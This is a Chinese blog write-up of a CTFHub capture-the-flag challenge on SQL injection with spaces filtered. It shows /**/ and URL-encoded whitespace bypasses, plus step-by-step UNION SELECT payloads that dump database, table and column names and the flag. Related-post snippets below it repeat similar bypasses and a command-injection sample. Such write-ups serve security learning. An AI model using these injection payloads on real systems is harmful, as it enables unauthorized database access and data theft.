CTFHUB-SQL注入-过滤空格

最新推荐文章于 2023-08-19 15:42:51 发布
最新推荐文章于 2023-08-19 15:42:51 发布
阅读量862 收藏 4
点赞数 2
分类专栏: CTFHUB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014794539/article/details/118635484
版权

考点
正常的注入 过滤了空格 需要绕过
过程分析
首先正常注入会提醒HACKER

经过尝试发现可以使用/**/代替空格绕过
注:%09 %0A %0D +据说也可以替代空格
获取数据库信息

0/**/union/**/select/**/1,database()/**/

在这里插入图片描述
获取表信息

0/**/union/**/select/**/1,group_concat(table_name)/**/
	from/**/information_schema.tables/**/where/**/table_schema='sqli'

得到表名whjmqubskr
然后列名 ,,,

0/**/union/**/select/**/1,group_concat(column_name)/**/
	from/**/information_schema.columns/**/
		where/**/table_name='whjmqubskr'

得到列名hxsdrfplft
最后 爆数据

0/**/union/**/select/**/1,group_concat(hxsdrfplft)/**/from/**/whjmqubskr

得到在这里插入图片描述
flag

ctfhub{3d5877ca87ad11851afb60de}
Pale1c
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Js过滤空格的实现代码
10-27
Js空格过滤代码,这个实用性很强,可以省去用动态语言过滤字符的麻烦,减轻服务器压力,而且JS执行速度较快
10-sql注入-mysql注入1
08-03
1.路径符号:要用双斜杠 \\ ,或者 / 2.转换为十六进制数,这样就不需要引号了 1.报错显示 3.遗留文件 phpinfo info test php 5
CTF---Web---SQL注入---03---联合注入+关键字过滤
qq_22160557的博客
07-29 758
文章目录前言一、题目描述二、解题步骤1、回显判断注入方式2、尝试列数3、寻找注入点4、尝试注入(库,表,列,字段)三、总结 前言 题目分类: CTF—Web—SQL注入—03—联合注入+关键字过滤 一、题目描述 题目:SQL注入 链接:http://192.168.87.175 二、解题步骤 1、回显判断注入方式 Step1: http://192.168.87.175/viewld.do?ldid=2,回显正常。有内容 Step2: http://192.168.87.175/viewld.do?ld
CTFHub_技能树_Web之SQL注入——过滤空格
Ho1aAs‘s Blog
12-23 931
文章目录一、过滤空格的绕过二、注入过程Ⅰ、爆表名Ⅱ、爆列名Ⅲ、爆flag 一、过滤空格的绕过 一般注入语句为 ?id=0 union select database(),user() 由于过滤空格致使无法执行注入的语句时,可使用以下字符代替空格,发挥同样效果 ():一对圆括号 +:加号 %09:TAB换行符的URL编码形式 /**/:块注释符 二、注入过程 依次尝试发现只能使用块注释符替换,那么开始注入: Ⅰ、爆表名 ?id=10/**/union/**/select/**/1,group_conc
CTFHub技能树笔记之RCE:命令注入、过滤cat、过滤空格
weixin_48799157的博客
03-28 8149
小白一个,记录解题过程,如有错误请指正! 一、命令注入 补充知识点: 命令行注入漏洞是指web应用程序中调用了系统可执行命令的函数,而且输入参数是可控的,如果黑客拼接了注入命令,就可以进行非法操作了。 Windows系统支持的管道符如下: 1. “|”:直接执行后面的语句。 2. “||”:如果前面的语句执行失败,则执行后面的语句,前面的语句只能为假才行。 3. “&”:两条命令都执行,如果前面的语句为假则直接执行后面的语句,前面的语句可真可假。 4. “&&...
CTFHub | 过滤空格
尼泊罗河伯的博客
12-04 2301
根据网页显示内容提示,这题关于过滤空格注入,此题和其他的注入手法一致,只不过需要在网页 URL 中对 payload 语句中的空格符号进行过滤,判断发现此题存在过滤空格注入,接着判断字段数量,查看数据库位置和版本。使用注入常用流程爆库、爆表、爆数据。最后获得此题 flag 。
CTFHUB-过滤空格
Web学习之路
03-28 254
替换
CTFhub-sql注入-绕过空格过滤
ssss39的博客
08-19 323
如果1/**/union/**/select/**/1=1的显示结果与1/**/union/**/select/**/1=2的显示结果不一样,1/**/union/**/select/**/1,2 没有将数据带出来。3 没有回显,说明只用 1,2 这两个。与1的结果一样说明存在注入点。字段名dzkctujmta。
php登录页面实现-SQL注入
03-07
php登录页面实现-SQL注入
SQLmap--SQL注入渗透测试工具
04-18
SQLmap--SQL注入渗透测试工具 方便进行SQL注入的渗透测试,它可以自动化检测和利用SQL注入缺陷以及接管数据库服务器的过程。 它有一个强大的检测引擎,许多适合于终极渗透测试的小众特性和广泛的开关,从数据库指纹...
安全测试-常见sql注入方法,命令
03-31
安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入...
WEB漏洞学习-sql注入
06-11
之前文章中的导图文件,由于个人的在线时间导致大家获取困难,现在放在这里供大家自行取用。
CTFHUB-WEB-SQL注入-过滤空格
weixin_49539962的博客
08-05 239
题目说了要过滤空格,使用“/**/”可以实现空格注释。
2021-07-08 CTFer成长之路-SQL注入-字符替换
热门推荐
时光隧道
07-08 5万+
一:字符替换 1.只过滤空格 除了空格,在代码中可以代替的空白符还有%0a、%0b、%0c、%0d、%09、%a0(均为URL编码,%a0在特定字符集才能利用)和/**/组合、括号等。假设PHP源码如下: $id = str_replace(" ","",$sql); 2.将SELECT替换成空 $id = str_replace("select","",$sql); 3.大小写匹配 在MySQL中,关键字是不区分大小写的,如果只匹配了"SELECT",便能用大小写混写的方式轻易绕过,如"sEleCT
CTFHub技能树web(持续更新)--SQL注入--过滤空格
jiuyongpinyin的博客
09-05 630
过滤空格 这道题依然可以使用手工和sqlmap的方式,这里先大概说一下手工,题目提示了过滤空格,那么我们就想办法绕过这里过滤,可以用“//”来代替空格: 这里使用联合查询语句爆破除了当前的数据库,接下来就是使用前文中提到过的手工注入,空格使用//来代替,爆破当前数据的表名: ?id=111/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_sche
SQL注入绕过空格过滤
gam0n的博客
06-05 1万+
一、通过注释绕过空格注释即/**/通过注释取代空格eg:  or/**/'me'/**/=/**/'isme'二、通过括号绕过空格eg: and(1=0)
ctfhub-过滤空格
m0_62094846的博客
12-15 850
<?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $ip = $_GET['ip']; $m = []; if (!preg_match_all("/ /", $ip, $m)) { $cmd = "ping -c 4 {$ip}"; exec($cmd, $res); } else { $res = $m; }...
CTFHUB-SSRF(未完)
u014794539的博客
07-09 1395
内网访问 考点 内网访问… 分析过程 hint:尝试访问位于127.0.0.1的flag.php吧 http://challenge-961103965419959c.sandbox.ctfhub.com:10800/?url=_ 打开后是如此URL的空网页 构造playload http://challenge-961103965419959c.sandbox.ctfhub.com:10800/?url=127.0.0.1/flag.php 得到flagctfhub{507b549cdbc0cc91
ctfhub sql注入
最新发布
10-09
CTFHub是一个CTF(Capture The Flag)竞赛平台,其中包含了各种类型的安全挑战,包括SQL注入SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以利用它来绕过应用程序的身份验证、访问未授权的数据或执行恶意操作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值